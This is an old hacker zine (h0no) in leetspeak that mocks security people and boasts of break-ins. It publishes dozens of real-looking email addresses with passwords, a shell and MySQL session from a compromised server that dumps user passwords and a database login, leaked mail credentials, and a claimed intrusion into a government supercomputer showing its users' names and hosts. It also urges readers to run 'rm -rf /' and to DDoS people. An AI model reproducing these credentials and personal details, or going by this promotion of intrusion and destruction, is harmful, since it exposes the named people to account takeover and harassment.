#!/bin/rm-rf/yourself ########################################################### ## 0wn & rm 0wn & rm 0wn & rm 0wn & rm 0wn & rm ## ## ,-----0-w-n-r-m-a-n-d-d-o-n-t-f-o-r-g-e-t-t-o-----. ## ## >-------------------------------------------------< ## ## | -~-~-~ hack @ work -~-~-~ | ## ## >-------------------------------------------------< ## ## | -~-~-~ hack @ school -~-~-~ | ## ## >-------------------------------------------------< ## ## | -~-~-~ hack @ library -~-~-~ | ## ## >-------------------------------------------------< ## ## | -~-~-~ hack @ friend's house -~-~-~ | ## ## >-------------------------------------------------< ## ## | -~-~-~ hack @ presidental nomination -~-~-~ | ## ## >-------------------------------------------------< ## ## `-----b-u-t--n-e-v-e-r--a-t--y-o-u-r--h-o-m-e-----' ## ## The hardest zine to rool the scene. ## ########################################################### ##:::::::::::::::::::::::::::::::w3:4r3:tw0:buzy:0wn1ng::## ##::::: ###:: ###: #########::::::::t0:m4k3:n3w:4scii::::## ##::::: ###:: ### ###::: ####::::::::::::::::::::::::::::## ##::::: ###:: ### ###:: #####: ###::::::: #########::::::## ##::::: ######### ###: ## ###: ########: ###:::: ###:::::## ##::::: ###:: ### ### ##: ###: ###:: ### ###:::: ###:::::## ##::::: ###:: ### #####:: ###: ###:: ### ###:::: ###:::::## ##::::: ###:: ###: #########:: ###:: ###: #########::::::## ##:::::::::::::HAPPY:THXGIVING:SEC:INDUSTRY::::::::::::::## ########################################################### ## [root@localhost:~] # rm -rf / ## ##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-## ## do yourself a favor and rm -rf / ## ##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-## ## [root@localhost:~] # ls ## ## bash: ls: command not found ## ########################################################### ##:::::::::::::::::::::::::::::::h0no:n3w:4ffl1l14t3:::::## ##:::::::::::::::::::::::::::(th3y:suck:4t:4scii:4sw3ll):## ## #########: #########: ###::: ### ########:: ###:: ###:## ##:::::: ### ###::: #### ####:: ### ###::::::: ###:: ###:## ##::::: ###: ###:: ##### #####: ### ###::::::: ###:: ###:## ##:::: ###:: ###: ## ### ### ## ### ####### ## #########:## ##::: ###::: ### ##: ### ###: ##### ###::::::: ###:: ###:## ##: ####:::: #####:: ### ###:: #### ###::::::: ###:: ###:## ## #########: #########: ###::: ### ########:: ###:: ###:## ##:::::::::::::::::::::::::::::::::::::::::::::::::::::::## ##:::::::::::::::::"w3:t4ught:r4f4:3v3ryth1ng:h3:kn0wz"::## ########################################################### ## 2005-~-2005-~-2005-~-2005-~-2005-~-2005-~-2005-~-2005 ## ########################################################### Message of the Day, segfault.net - - 17/12/2004 10:23 - Welcome to - ircs. - .________._______._____ ._______.______ .____ .___ _____._ - | ___/: .____/:_ ___\ :_ ____/: \ | |___ | | \__ _:| - |___ \| : _/\ | |___| _/ | . || | || | | :| - | /| / \| / || | | : || : || |/\ | | - |__:___/ |_.: __/|. __ ||_. | |___| || || / \ | | - : :/ :/ |. | :/ |___||. _____/ |______/ |___| - : :/ : :/ - : .net : - - Your IRCOp Team on ircs.segfault.net is - skyper@segfault.net (skyper) - gamma@segfault.net (gamma) - andi@segfault.net (andi) - hendy@segfault.net (hendy) - - "h0no rux" 2 d4yz l4t3r... *** IRCS RE-CLOSED FOR THE GENERAL PUBLIC *** WE STOPPED TO GIVE OUT CERTIFICATES. BE HAPPY IF YOU HAVE A USER BOUND CERTIFICATE. WE WILL GIVE OUT 1 CERTIFICATE TO ALL NEW USERS IN JAN 2005. Yours sincerly, * Connect retry #66 127.0.0.1 (31337) -1.txt Intr0dukti0n 00.txt -~-~-~ 50 whitehat email accountz for you to rm. 01.txt -~-~-~ tal0n`s supreme hacker resume 02.txt -~-~-~ cyberarmy corpse used & abused 03.txt -~-~-~ Tales From the Dark Side of The Net 04.txt -~-~-~ shcrew submits to h0no! 05.txt -~-~-~ perlsex [aka. how to get laid] 06.txt -~-~-~ Exploit Modelling and Generalization 2 07.txt -~-~-~ d4nc3 d4rkcub3, d4nc3 08.txt -~-~-~ bhs-authkeys h4s a c4s3 0f th3 buff3r 0v3rphl0wz 09.txt -~-~-~ thor the milf hunter 10.txt -~-~-~ Incerptz from Deception Magazine 11.txt -~-~-~ th3 h0no gu1d3 t0 g3tt1ng bust3d 12.txt -~-~-~ H0NO INTERNET PROGRAM PROTOCOL SPECIFICATION 13.txt -~-~-~ boobys iz liarz 14.txt -~-~-~ Morning_wood goes limp 15.txt -~-~-~ cripy's guide to becoming elite 16.txt -~-~-~ doni038 has a bad day 17.txt -~-~-~ piss poor tal0n 18.txt -~-~-~ Mr. pd meet Mr. rm 19.txt -~-~-~ intrusion into atomix's personal space 20.txt -~-~-~ hack em up 21.txt -~-~-~ rotor got owned 22.txt -~-~-~ hackthismoron.org [aka. soulsyphon cant hack] 23.txt -~-~-~ hacker'z warez vaultz 24.txt -~-~-~ case of the missing scene whore 25.txt -~-~-~ atomix once again 26.txt -~-~-~ pROjeCKt "HeY MaM!" 27.txt -~-~-~ h0no h1tz th3 b0ttl3 28.txt 0utr0 -1.txt-~-~-~ Intr0dukti0n Welcome back fuckz, to the only zine not on textfiles.com. More ownings than a pr0j3ct m4yh3m cell, more rm's than a jobe password guessing session, more 0dayz than a zone-h forum. Are you ready for the next installment of the ever feared h0no zine? You better fucking hope you pgp'd all your warez and doubled checked your pda for keyloggers. We noticed alot of whitehats have quit using irc. Even the greatest irc whore of them all has seen his last dayz on the eris free network. This is a profound advancement for the hacker community. And do not even think of hiding on retarded fucking silc, we'll ddos that shit faster than darkacid's patented ./syn-ack-fin-ping-zap-mircforce-allinone Hopefully by the end of the year all efnet, unet, and freenode servers will be delinked. Follow OseK & sly's example, DDoS anyone who talks. ho, I see ircsnet knowz whats up. One more ircd taken offline by the relentless h0no ddos attaq! Skyper is shaking in pheer, gamma is checking all his warez for bdz. fx, thinking he better be safe is letting h0noIDSd run (he thinkz itz cmn'z 0day warez detector). scut, the only real hacker on planet earth, hopes to save himself from humiliation and decides to join h0no. He echo'z "h0no - pr0uD suPp0rT3rZ oF wh1t3h4ts 4nd the1r rm'd b0x3z." into /etc/motd, but get'z `rm -rf ~/code/` injected into his terminal before he pressez return. Learn to love the h0no, or get ready to feel the pain of our zone-h 0day. You asked for bx ownings, you got it. You asked for backdooring whitehat software, you got it. You asked for more mailspools, more rm'ings, more 0days, you got it! For our zone-h friends we would like to introduce the return of the johnqpublic mailing list! That's right, now you dont even need an 0dd membership to gain ops in #darknet. This issue is not formatted in any way. Too bad. 00.txt-~-~-~ 50 whitehat email accountz for you to rm. 4ft3r 0wn1ng th3 bugtr4q p0st1ng w4nn4b3z @ whitehat.co.il w3 d3c1d3d t0 us3 th31r 0wn r41nb0w t4bl3 t0 cr4ck s0me p4ssw0rdz fr0m th31r us3r db. 2 m0nthz 0f cr4ck1ng, 4nd th3y n3v3r 3v3n n0t1c3d. lucky f0r y0u p3n-t3st3rz, w3 d1dnt g3t ar0und t0 b4qd00r1ng wh0pp1x... y3t. 4nd r3m3mb3r, 4lw4yz c0mp1l3 l1nux s3cur1ty m0dul3z wh3n 1nst4ll1ng 4 n3w d1str0. h4rh4rh4r. blsp2003@yahoo.com pass:85208520 sene@speedy.com.ar pass:006892 <- 0wn3d f4st3r th4n 4 sp33d1ng bull3t. cnotemisha@hotmail.com pass:080770 <- w3 rm'd 4ll th1s guyz 3m41lz. guilamupub@ifrance.com pass:170979 j4f0@hotmail.com pass:yali604 <- 00pz, th0ught th1s w4s j4f. st4n@safe-mail.net pass:lonya2k <- y0ur m41l 1s n0t s4f3. kesakki@hotmail.com pass:drockford sleepytechnics@ziplip.com pass:doop1 morningwood@thepub.co.za pass:qazwsx <- bu4h4h4h4, m0r3 0n th1s cl0wn l4t3r. vi_ce@Phreaker.net pass: h4x00r?? axess@inbox.ru pass:Janina ben.alamio@gmail.com pass:046238317 <- w3 s3nt h4t3 l3tt3rz t0 th1s m0r0nz gf. invisible_true@web.de pass:wasgeht., nielsmans@chello.nl pass:andrehazes12 metatron12344@hotmail.com pass:foxwood blaublut05@hotmail.com pass:06sandra22 bigtymer809@mail.com pass:juvenile <- 0wn3d th1s p1mp. Ctzokas@aol.com pass:51l3nt50ul sKulls.inc@web.de pass:ja09021971 <- h3 3m41l3d skyp3r 4sk1ng f0r 4n4l s3x. jvandertil@home.nl pass:Xdfez28d filip_waeytens@yahoo.com pass:gu9Quoro <- w4tch h1m b3g f0r j0bz. 4lm0st 4s b4d 4s m0rn1ngw00d. dpendich@yahoo.co.uk pass:mija1joka digger@telenet.be pass:lotuselise0 valvesoftware@gmail.com pass:deadheart <- h0no l0v3z myg0t. k33p up th3 g00d w0rk. funnykiller@hotmail.com pass:17231723 <- 0nly th1ng funny 1s y0ur w34k p4ss. binbag@bonbon.net pass:hm0761 <- n0t 3v3n h0tp0p c4n s4v3 y0u n0w. jvandertil@home.nl pass:Xdfez28d kill3r_lw@hotmail.com pass:augsburg physaro@mail.ru pass:mk020688 <- h00k3d us up w1th m00 w4r3z. nielsmans@chello.nl pass:andrehazes12 <- h00k3d us up w1th n3tr1c w4r3z. fajfajf@wp.pl pass:kopijk2 <- h00k3d us up w1th is3c w4r3z. wikeee@hotmail.com pass:jackass <- h00k3d us up w1th 0s3c p0rn. broach27@hotmail.com pass:d1m1tr1 mtm@iaml33t.com pass:l33tc0m <- d0nt fuck w1th th3 tru3 3l33tz. allenrintoul@yahoo.com pass:19yrdd30 phinix@gmail.com pass:9910nm <- d0rk wh0 c4nt c0de. joker45@mails.de pass:lol50lol Bzillins@gmail.com pass:Armm700Ada <- CCN4 stup1d1ty @ 1tz f1n3st. xxradar@radarhack.com pass:LYHYYTvp maartenb@cistron.nl pass:thunder1 dtredwell94@yahoo.com pass:t033631397 w4s th@ f1ft33? 3y3 c4nt c0unt. noth1ng 0n th1s b0x but w3b sh1t. sh-2.05$ grep whitehat /etc/passwd whitehat:x:550:550::/home/whitehat.co.il:/bin/bash sh-2.05$ cd cgi-bin sh-2.05$ ls -al total 900 drwxr-xr-x 4 whitehat whitehat 4096 Jun 7 2004 . drwxr-x--x 22 whitehat whitehat 12288 Dec 18 07:37 .. -rw-r--r-- 1 whitehat whitehat 150 Jun 7 2004 .htaccess -rw-r--r-- 1 whitehat whitehat 19 Jun 7 2004 .htpasswd -rw-r----- 1 whitehat whitehat 1516 Jun 7 2004 LICENSE -rw-r--r-- 1 whitehat whitehat 5212 Jun 7 2004 README drwxr-xr-x 2 whitehat whitehat 4096 May 19 2004 fileman-2.1.1 -rw-r--r-- 1 whitehat whitehat 867434 Jun 7 2004 fileman-2.1.1.tar.gz -rwxr-xr-x 1 whitehat whitehat 3145 Feb 7 2003 fileman.cgi drwxrwxrwx 2 whitehat whitehat 4096 Jun 7 2004 images sh-2.05$ cat .htaccess AuthUserFile /home/whitehat.co.il/html/cgi-bin/.htpasswd AuthGroupFile /dev/null AuthType Basic AuthName Protected require valid-user sh-2.05$ cat .htpasswd muts:H.Z./aF2k1kTE sh-2.05$ cd .. sh-2.05$ cd e107_files sh-2.05$ ls -al total 88 drwxr-xr-x 10 whitehat whitehat 4096 Sep 29 16:04 . drwxr-x--x 22 whitehat whitehat 12288 Dec 18 07:37 .. drwxr-xr-x 2 whitehat whitehat 4096 Mar 2 2004 backend drwxr-xr-x 2 whitehat whitehat 4096 May 28 2004 cache -rw-r--r-- 1 whitehat whitehat 2533 Sep 29 16:16 def_e107_prefs.php -rw-r--r-- 1 whitehat whitehat 416 Jun 2 2004 default.css drwxr-xr-x 2 whitehat whitehat 4096 Mar 2 2004 downloadimages drwxr-xr-x 15 whitehat whitehat 4096 Mar 24 2004 downloads drwxr-xr-x 2 whitehat whitehat 4096 Mar 2 2004 downloadthumbs -rw-r--r-- 1 whitehat whitehat 741 Jun 2 2004 e107.css -rw-rw-rw- 1 whitehat whitehat 4648 Sep 29 16:16 e107.js drwxr-xr-x 2 whitehat whitehat 4096 Mar 2 2004 images drwxr-xr-x 2 whitehat whitehat 4096 Mar 3 2004 misc drwxrwxrwx 3 whitehat whitehat 8192 Dec 19 19:55 public -rw-rw-rw- 1 whitehat whitehat 9381 Sep 29 16:04 resetcore.php -rw-r--r-- 1 whitehat whitehat 642 Sep 29 16:04 style.css -rw-r--r-- 1 whitehat whitehat 0 Jun 2 2004 user.js sh-2.05$ mysql --user=whitehat_ntlm --password=dantlmpwoject Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 15175305 to server version: 4.0.14-log Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> show databases; +---------------+ | Database | +---------------+ | whitehat_ntlm | +---------------+ 1 row in set (0.00 sec) mysql> use whitehat_ntlm Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +-------------------------+ | Tables_in_whitehat_ntlm | +-------------------------+ | ntml_login | | ntml_tables | | ntml_users | +-------------------------+ 3 rows in set (0.00 sec) mysql> select * from ntml_users; +----+-------------+------------+ | id | username | pwd | +----+-------------+------------+ | 4 | muts | ntlmthang | | 5 | ports | 0469gj7tio | | 6 | Dyngnosis | ewenm0re | | 7 | skiller | T5oa0rlu | | 8 | illwill | 4PoekIEt | | 9 | st4n | prOuqO92 | | 10 | sl33py | z8u7oapr | | 11 | koka | p9lUph2A | | 12 | icem3n | 6iumouD1 | | 13 | Viking | MiU0oeHL | | 14 | epikorous | dO7foU1o | | 15 | jerryshenk | slek6ah3 | | 16 | realmus | kL55iETr | | 17 | bitwild | fLEdOa7i | | 18 | syko | X1ubrLAm | | 19 | stardust | 6oapOEfr | | 20 | xxradar | piag7eWr | | 21 | GuYoMe | XLucouM0 | | 22 | gabriel | tHluV4ut | | 23 | Saphirio | cR5uf6lu | | 24 | phrozen77 | 9oEtHies | | 25 | sh4d0w | M7abRiEK | | 26 | kodkod | 6lEtH0as | | 27 | foobar | jiUD7oeS | | 28 | Lonsdale | p0iUGoaY | | 29 | cReDiAr | p0iUGoaY | | 30 | wiley | qleki43L | | 31 | revised | swoU33eT | | 32 | villanovax | fr9UPrOe | | 33 | bigticket | dRo2sOAr | | 34 | psich | DL0tri5d | | 35 | smeagul | cr1no!0 | | 36 | itzik | cHIabr6a | | 37 | Blsp | d0uFRled | | 38 | WiNeOS | spleziu0 | | 39 | mandoskippy | kl15a01 | | 40 | J-ATHIAS | wrOE29ut | | 41 | s1ruS | klemI02l | | 42 | Andy | N48stlUr | | 43 | ThaGangsta | XLustlUr | | 44 | Lotek | Sc4p3r45 | | 45 | l33ters | kleUPrOe | | 46 | Titon | rLAmkleU | | 47 | hegemonie | d0uFbrLA | | 48 | phenfen | z8uleq2c | | 49 | ark | d0uFI0cC | | 50 | HMS | 0oufIAno | | 51 | gabry | ouM0N48d | | 52 | z0mbi3 | 0rluFdf3 | | 53 | SeC_SquaD | brlesT6u | | 54 | c0axial | Fdf3led5 | | 55 | vice | 0rlFk6ah | | 56 | striz | dlasw4Ef | +----+-------------+------------+ 53 rows in set (0.00 sec) mysql> select * from ntml_login select * from ntml_login; +-----------+----------------------------------+------------+-----------------+----------------------------------------------------+ | username | uin | expire | ip | browser | +-----------+----------------------------------+------------+-----------------+----------------------------------------------------+ | phrozen77 | 927738bed5ead0abdba7b587d5820c92 | 1103492331 | 217.224.199.249 | T 5.0; de-DE; rv:1.7.5) Gecko/20041122 Firefox/1.0 | +-----------+----------------------------------+------------+-----------------+----------------------------------------------------+ 1 row in set (0.01 sec) mysql> exit Bye sh-2.05$ cd ../5 sh-2.05$ ls -al total 272 drwxr-xr-x 2 whitehat whitehat 4096 Aug 15 04:55 . drwxr-x--x 22 whitehat whitehat 12288 Dec 18 07:37 .. -rw-r--r-- 1 whitehat whitehat 1325 Jul 19 07:45 action.php -rw-r--r-- 1 whitehat whitehat 1620 Jul 19 07:45 admin.php -rw-r--r-- 1 whitehat whitehat 603 Jul 19 13:54 config.inc.php -rw-r--r-- 1 whitehat whitehat 1893 Aug 7 11:05 index.html -rw-r--r-- 1 whitehat whitehat 786 Jul 19 09:18 index.html.orig -rw-r--r-- 1 whitehat whitehat 2860 Jul 19 15:56 list.php -rw-r--r-- 1 whitehat whitehat 1748 Jul 19 07:45 login.php -rw-r--r-- 1 whitehat whitehat 2252 Jul 19 07:51 login_check.inc.php -rw-r--r-- 1 whitehat whitehat 172 Jul 19 07:45 logout.php -rw-r--r-- 1 whitehat whitehat 220368 Aug 7 11:06 md5.jpg sh-2.05$ pwd /home/whitehat.co.il/html/5 sh-2.05$ cat config.inc.php cat config.inc.php username'"); $userdaten = mysql_fetch_object($get_userdaten); ?>sh-2.05$ n33dl3ss t0 s4y, th3s3 wh1t3h4t fuckz g0t 0wn3d t0 h3ll n b4ck. 1t 1z y0ur duty t0 rm th31r m41l 4s4p! 4ls0, 4s 4 n0t3 t0 mutz, pl34s3 k33p m0r3 0d4yz 0n th1s s3rv3r. W3 h4t3 t0 us3 0ur 0wn. 01.txt-~-~-~ tal0n`s supreme hacker resume tal0n` 1s 4n 3x-d3f4c3r 4nd curr3nt l34d3r 0f th3 3v3r sk1ll3d g0tf4ult s3cur1ty gr0up. H3 1s 4ls0 curr3ntly un3mpl0y3d. N0t1c3 4s st4t3d b3f0r3 1n h0no, tal0n` cl4mz t0 b3 21 y34rz 0ld. Th4t'z 4l0t 0f t1m3 sp3nt try1ng t0 gr4du4t3 h1gh sch00l. l0lz. Name: Contact: cyber_talon@hotmail.com or cybertalon@gmail.com Objective: Seeking position as a network and/or system administrator or security anaylst/consulant. Education: High School Student. Skills: Administration - Linux/BSD System and Network Administration. Hardware - Building, Development, Trouble-shooting. Operating Systems - BSD, Linux, Solaris, Windows. Programming - ASM, C, C++, Perl, UNIX Socket. Networking: Filtering, Firewalls, Routers, TCP/IP. Scripting - BASH, HTML. Software - Console, FTPd, HTTPd, KDE, SSHd. Other - Advanced Configuration and Development, Code Auditing, People Skills. Experience: BSD - 2 Year Linux - 3 Years Solaris - 6 Months Windows - 5 Years Networking: Successfully networked 5-6 computers together using a router and a switch thru a cable internet connection. Wrote /etc/host files on Linux/BSD for ease of access. Experience with network mapping, discovery, and some routing. Written Code: DES Text Encryptor - http://www.hbx.us/tal0n/code/cit.c HTTPd Checker - http://www.hbx.us/tal0n/code/httpd-chk.c RAW Packet Crafter - http://www.hbx.us/tal0n/code/pcraftv2.c Root Password Generator - http://www.hbx.us/tal0n/code/trpg.c System Log Injector - http://www.hbx.us/tal0n/code/loginject.c Written Texts: Beginners Guide to UNIX Sockets on Linux in C - http://www.hbx.us/tal0n/papers/unixsocket-guide.txt Code Auditing in C - http://www.hbx.us/tal0n/papers/codeauditing.txt FreeBSD Security Techniques - http://www.hbx.us/tal0n/papers/fbsd-sec-teqs.txt Introduction to Social Engineering - http://www.hbx.us/tal0n/papers/social-engineering.txt Linux System Administators Security Guide - http://www.hbx.us/tal0n/papers/lin-adm-secguide.txt Other Hobbies/Skills: Basketball, Engineering, Inventing, Motorsports, Security, Tennis. D34r tal0n`, h0no 1s curr3ntly 1n n33d 0f a jr. m41lr00m 4tt3nd3nt. w3 f33l 4s 1f y0ur c0ntr1but10nz t0 th3 s3cur1ty c0mmun1ty c0uld b3tt3r b3 s3rv3d h4ndl1ng 3nv0l0p3z 0f 4nthr4x th4n n3tw0rk1ng y0ur g4m3b0y 4dv4nc3z t0g3th3r. 1f s3l3ct3d f0r th3 j0b w3 h0p3 y0u w1ll h3lp 0ur curr3nt t3nn1s t34m by supply1ng 4n 3xtr4 r4ck3t. w3 br0k3 0n3 0v3r m1tn1ck'z h34d 4t th1s y34rz d3fc0n. pl34s3 r3sp0nd 4s4p, 4s th1s 0ff3r w0nt l4st l0ng. 4tt4tch3d 1s 4 n3w h4ck3r r3sum3 t3mpl4t3 f0r y0ur futur3 us3. g00d luck! -w3 0wn y0ur 4ss, h0no. -~-~-~ h4ck3rcr4ck3r.txt h3ll0~!@# my n4m3 1s __[insert name]__, but y0u c4n c4ll m3 __[insert handle]__. c0nt4ct m3 0n 4lt.s3x.s1st3r my 0bj3ct1v3 1s t0 __[h4ck/d0s/sp4m/b3c0m3 bugtr4q st4r]__ 3duc4t10n: g.3.d.. w3ll 4lm0st, 3y3 n33d a j0b t0 p4y f0r b00kz!@# my sk1llz 1nclud3, but 4r3 n0t l1m1t3d t0... pr0gramm1ng & scr1pt1ng - 0r wh4t 3y3 l1k3 t0 c4ll b0rl4nd bu1ld3r'1ng. 4dm1n1str4t10n - th1s 1s wh4t y0u d0 4ft3r y0u 0wn 4 b0x. h3h3 0p3r4t1ng syst3mz - win 3.1,98,nt,lunix,nuxi,OS10xpl.50sp, __[osirisis/obsd/macos 4/juniper os]__ (1t r34lly d03snt m4tt3r s1nc3 w1nd0wz 1s 4ll y0u'll b3 lus1ng.) 0th3rz - 4DV4ND3D!! c0nf1gur4t10n(.bashrc & 3d1t1ng cr0n j0bz) 3xp3r3nc3 1nclud3z, 4nd 1s s3v3r3ly l1m1t3d t0... st4rt1ng w1nd0wz 4nd b34t1ng up my s1st3r. N3tw0rk1ng!@# (my sp3ch1alty) 3y3 c4n c4ll t3chn1c4l supp0rt 4ny t1m3, 4ny wh3r3 w1th my n4t10nw1d3 c3llul4r ph0n3 c0v3r4g3 by spr1nt pcs.!!!! 3y3 th1nk 3y3 h4v3 s33n 4 __[c4t5e/f1b3r/c0x14l/1nt3rn3t]__ c4bl3 b3f0r3. wr1tt3n c0de... 1t'z 4ll b33n rm'd du3 t0 l4m3n3ss. 3y3'll g3t __[v1l3`/bx/blue boar/red dragon/purple jimi]__ t0 c0de s0m3th1ng f0r m3. Wr1tt3n t3xt.. (pl34s3 n0t3 th4t 3y3 wr0t3 th3s3 m0stly by my s3lf, my s1st3r h3lp3e w1th sp3ll1ng. but 0nly 4 l1ttl3!!@#) h0w t0 b4r3b4ck, th3 g4y w4y. us1ng, 4nd r3us1ng c0d3. h0w t0 aud1t f0r strcpy's 1n j4v4 futur3 b00k r3l34s3 1s pl4nn3d w1th so1o 1n 2005!@# (t1tl3: h0w t0 h4ck 4m3r1c4n sh1tbr1ckz. vol. 1) 0th3r H0bb13s/Sk1llz... 3y3 c4n run n4k3d 4r0und my h0us3 1n und3r 4 s3c0ndz. curr3ntly l43rn1ng 4b0ut c0ndumz 1n h43lth cl4ss. c4n m4k3 4 qu4ck1ng n01s3 w1th my n0s3. t3nn1s. (3y3 4m th3 n3xt 4urth3r 4sh) 02.txt-~-~-~ cyberarmy corpse used & abused by kajun. I hacked someone!! want to hear about it? Dont tell anyone it was me! I hate the cyberarmy. I tried their challenges but I could only make it to trooper. After asking mryowler for help he told me to learn networking.. Fuck that. Networking is for like dorks who sit all day making up subnets for their lans of dreamcasts. Instead I sat on irc and message boards hoping some hackers would tell me passwords to hacked accounts. hehe, this works good and I can still beat off to my jpegs of di]v[ples. It just so happend that I was on the cyberarmy.net forum when somebody posted with the nick of 'eYeOwNYoUaLL'. Judging by his nick this guy is a supreme hacker. Needless to say I wasn't disappointed by his post, check it out: Posted by: eYeOwNYoUaLL on Friday Oct. 29th 2004 by *.ownz.shcrew.net H3Y B0YZ 4ND G1RLZ, TR00P3RZ 4ND G3N3R4LZ. 3Y3 W4S SN1FF1NG S0M3 K0R34N'Z N3T WH3N I R4N ACC0SS TH1Z. +OK <1219.1082946821@ch0wn.com> user sirexar@crazy-horse.net +OK pass ch0wnj00 1PH U N33D H3LP L0G1N1NG 1N JUST 4SK M3 0N H0N0'Z 0FF1C4L 1RC CH4NN3L, #DARKNET (TH4TZ 3FN3T, N0T CYB3R4RMY 1RCD). I couldn't believe my eyes. I know I saw a user and password in there, but there was alot of networking shit too. I imediately opened trillian and visited this #darknet channel. WOW! elite guys in there. I was almost so intimidated that I creamed my shorts. Luckily for me I just went to the bathroom to beat off 5 mins prior. eYeOwNYoUaLL helped me out in private messages. He said to get a pop3 client or whatever. I didn't listen. Instead I told him to just show me any emails from cyberarmy.net. These h0no guys are very helpful. He messaged me this: * er1cbrux is er1cbrux!efnet@icerslair.com eY3OwNYoUaLL * er1cbrux is +#darknet * er1cbrux has been idle 1452 hours 12 mins 53 secs. * er1cbrux is using irc.efnet.org er1cbrux!efnet@icerslair.com> h3r3 1t 1z.. er1cbrux!efnet@icerslair.com> From: "CyberArmy" er1cbrux!efnet@icerslair.com> er1cbrux!efnet@icerslair.com> To: "ViRsOveRiD" er1cbrux!efnet@icerslair.com> er1cbrux!efnet@icerslair.com> Date: 28 Oct 2004, 01:09:30 PM er1cbrux!efnet@icerslair.com> Subject: Password Successfully Reset er1cbrux!efnet@icerslair.com> (virsoverid) er1cbrux!efnet@icerslair.com> er1cbrux!efnet@icerslair.com> ---------------------------------------- er1cbrux!efnet@icerslair.com> --------------------------------------- er1cbrux!efnet@icerslair.com> er1cbrux!efnet@icerslair.com> The following is an automated email from er1cbrux!efnet@icerslair.com> CyberArmy. er1cbrux!efnet@icerslair.com> er1cbrux!efnet@icerslair.com> Hello,virsoverid er1cbrux!efnet@icerslair.com> This is a confirmation that your er1cbrux!efnet@icerslair.com> CyberArmy password er1cbrux!efnet@icerslair.com> has been reset to: 19aHPxl6 er1cbrux!efnet@icerslair.com> er1cbrux!efnet@icerslair.com> -- er1cbrux!efnet@icerslair.com> CyberArmy, er1cbrux!efnet@icerslair.com> http://www.cyberarmy.net/about/ er1cbrux > thanks dude! er1cbrux > you got any logins for porn ftps?? He did not reply to my last request. He must have been busy hacking some for me. I tried to go back to efnet later because I couldnt figure out how to login to cyberarmy, but he was no longer in #darknet. Hopefully someone out there can figure this great hacker mystery out! ps. cyberarmy.com rules cyberarmy.net. mryowler can code circles around you .net fools. pss. I heard sirexar is an ircop on cyberarmy's ircd. I hope no one (wa1800z@cyberarmy.net) emailed him his ircop pass. Someone login and check this out for me!! 03.txt-~-~-~ Tales From the Dark Side of The Net t00 3l173 f0r us, 1tz th3 TDSN z1n3@!# str8 fr0m b0b'z sh3ll. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ____.____ ____._.__ ___.___ ______.____ ³ ³| | | \_ _/ \_ | | ': ³ ³|_ _| | . | | ._____: | : | ³ ³ | | | .: | |______ | | | ³ ³ | . | :. | | `| | | . | ³ ³ | : | _| |_ _| | : | ³ ³ :.____| :.____ ___/ \___ ___/ :.___|______| ³ ³ ' ' ' ' ³ ³±±±±-- Tales From the Dark Side of The Net±±±±±±±±±±±±³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ TDSN Ep. 0x0 - by the anonymous hacker previously known as ***** ~~~~~~~~~~~~~ y0. with great pleasure i present to you the first episode of TDSN. this is something i made so ppl c4n s3e h0w co0l hekkers are. nah, its just fun to read for the first episode i figured..man, theres this idiot. hes a fucking banana i want to crack his password so bad. so i use my leet skillz to get it mofo:ph5BNn5xY7nT6:12303:::::: ok leet. on my machine i only get about 500.000 keys/sec on regular des so i figured, wtf, letz just use a supercomputer. so i surf the web alittle and find one that suits my needs. The Oak Ridge National Laboratory's "Cheetah". i present to you a small excerpt: Cheetah is a 27-node IBM pSeries System operated by the Computer Science and Mathematics Division of Oak Ridge National Laboratory. Cheetah has 27 "Regatta" nodes, each with thirty two 1.3 GHz Power4 processors. The Power4 storage hierarchy consists of three levels of cache. The first and second levels are on board the Power4 chip (two processors to a chip.) Level 1 instruction cache is 128 KB (64 KB per processor) and the data cache is 64 KB (32 KB per processor.) The level 2 cache is 1.5 MB of L2 cache shared between two processors. The level 3 cache is 32 MB and off-chip. There are 16 chips per node. OK pretty neat. that would be nice to crack the little slut's password on So basically, this computer has got 32 * 27 1.3 GHz Power4 processors. mkayz well where to begin? well..i dunno really. one day i found myself rooting an undisclosed .edu in the us and...tdah. <3 hostkeys nyanya[.ssh]> ssh cheetah.ccs.ornl.gov cens0red@cheetah.ccs.ornl.gov's password: Last login: Sun Nov 16 22:33:13 EST 2003 on ssh from cens0red.edu ************************************************************************ NOTICE TO USERS This is a Federal computer system and is the property of the United States Government. It is for authorized use only. Users (authorized or unauthorized) have no explicit or implicit expectation of privacy. Any or all uses of this system and all files on this system may be intercepted, monitored, recorded, copied, audited, inspected, and disclosed to authorized site, Department of Energy, and law enforcement personnel, as well as authorized officials of other agencies, both domestic and foreign. By using this system, the user consents to such interception, monitoring, recording, copying, auditing, inspection, and disclosure at the discretion of authorized site or Department of Energy personnel. Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning. ************************************************************************ ksh -i $ prtconf|head System Model: IBM,7040-681 Machine Serial Number: 0207D6A Processor Type: PowerPC_POWER4 Number Of Processors: 32 Processor Clock Speed: 1300 MHz CPU Type: 64-bit Kernel Type: 32-bit LPAR Info: 1 NULL Memory Size: 32768 MB Good Memory Size: 32768 MB $ who|head -20 root pts/0 Nov 10 20:21 (manx.ccs.ornl.gov) marc pts/1 Nov 11 23:48 (12-232-222-54.client.attbi.com) llwang pts/2 Nov 10 22:52 (sred2.qtp.ufl.edu) weima pts/3 Nov 11 16:58 (plasma2.physics.uiowa.edu) patrick pts/4 Nov 12 05:49 (nemo.physics.ncsu.edu) vince pts/5 Nov 12 14:08 (nugigan.lbl.gov) vince pts/8 Nov 12 20:38 (nugigan.lbl.gov) xtao pts/9 Nov 11 10:22 (csp20.csp.uga.edu) zingale pts/10 Nov 11 17:10 (nan.ucolick.org) gaa pts/11 